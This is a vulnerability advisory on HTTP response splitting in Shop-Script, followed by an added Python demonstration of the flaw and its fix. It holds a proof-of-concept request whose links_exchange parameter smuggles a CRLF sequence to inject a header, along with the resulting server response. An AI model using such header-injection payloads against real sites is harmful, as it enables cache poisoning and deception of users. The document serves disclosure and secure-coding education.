source: https://www.securityfocus.com/bid/20685/info
Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input.
A remote attacker may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.
[Request Header]
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1
[Response Header]
HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header <= [Custom response injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html
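
The reflection shown in the exchange above, modelled as an added example (not Shop-Script code and not part of the original advisory). The function names and the simplified 302 response are assumptions; the block compares writing the decoded links_exchange value into Location as-is with percent-encoding it first, and shows a reject-style check for CR/LF.

```python
from urllib.parse import quote, unquote

# Constructed sample: the links_exchange value from the request above, as sent on the wire.
RAW_VALUE = "%0d%0aFakeHeader:Fake_Custom_Header"


def build_redirect(value, encode):
    """Assemble a simplified raw 302 response that reflects `value` into Location.

    encode=False models the unsanitized reflection the advisory describes
    (hypothetical reconstruction); encode=True percent-encodes the value first.
    """
    if encode:
        # CR and LF become %0D%0A and stay inside the URL instead of ending the header line.
        value = quote(value, safe="")
    lines = [
        "HTTP/1.1 302 Found",
        "Location: index.php?links_exchange=" + value,
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines)


def header_names(raw):
    """Return the header field names a client would parse from the raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]


def has_crlf(value):
    """Input check: True if the decoded parameter carries CR or LF and should be rejected."""
    return "\r" in value or "\n" in value


if __name__ == "__main__":
    decoded = unquote(RAW_VALUE)  # what the application sees after URL decoding
    print("unsanitized:", header_names(build_redirect(decoded, encode=False)))
    print("encoded:    ", header_names(build_redirect(decoded, encode=True)))
    print("reject?     ", has_crlf(decoded))
```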